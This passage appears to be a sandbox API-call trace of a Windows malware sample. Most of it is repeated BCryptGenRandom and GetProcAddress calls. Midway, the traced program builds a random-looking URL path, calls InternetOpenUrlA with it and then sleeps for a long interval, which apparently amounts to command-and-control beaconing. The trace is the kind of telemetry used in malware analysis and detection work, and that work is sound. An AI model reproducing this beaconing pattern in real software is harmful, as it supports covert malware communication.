pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0248.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fbe, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a16fbe) returned 0x0 [0248.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.344] GetProcessHeap () returned 0x440000 [0248.344] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0248.344] lstrcpyA (in: lpString1=0x473da0, lpString2="\x80o¡\x03" | out: lpString1="\x80o¡\x03") returned="\x80o¡\x03" [0248.344] lstrcatA (in: lpString1="\x80o¡\x03", lpString2="/Jjer3eGj50betb2UhjObLeuctz6dx/Yj6gr6fuhMx0t0mtiq96wGz8Gfy4Kf/rk78rx8Y04hwyw4kz9h9zz/" | out: lpString1="\x80o¡\x03/Jjer3eGj50betb2UhjObLeuctz6dx/Yj6gr6fuhMx0t0mtiq96wGz8Gfy4Kf/rk78rx8Y04hwyw4kz9h9zz/") returned="\x80o¡\x03/Jjer3eGj50betb2UhjObLeuctz6dx/Yj6gr6fuhMx0t0mtiq96wGz8Gfy4Kf/rk78rx8Y04hwyw4kz9h9zz/" [0248.345] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0248.345] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x80o¡\x03/Jjer3eGj50betb2UhjObLeuctz6dx/Yj6gr6fuhMx0t0mtiq96wGz8Gfy4Kf/rk78rx8Y04hwyw4kz9h9zz/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0248.345] GetProcessHeap () returned 0x440000 [0248.345] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0248.345] GetProcessHeap () returned 0x440000 [0248.345] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0248.345] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0248.345] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0248.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0248.346] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0248.346] Sleep (dwMilliseconds=0x1baf3) [0248.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0248.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.559] GetProcessHeap () returned 0x440000 [0248.559] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a175c0 [0248.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175c1, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a175c1) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0248.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175e3, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a175e3) returned 0x0 [0248.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0248.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175fa, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a175fa) returned 0x0 [0248.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, 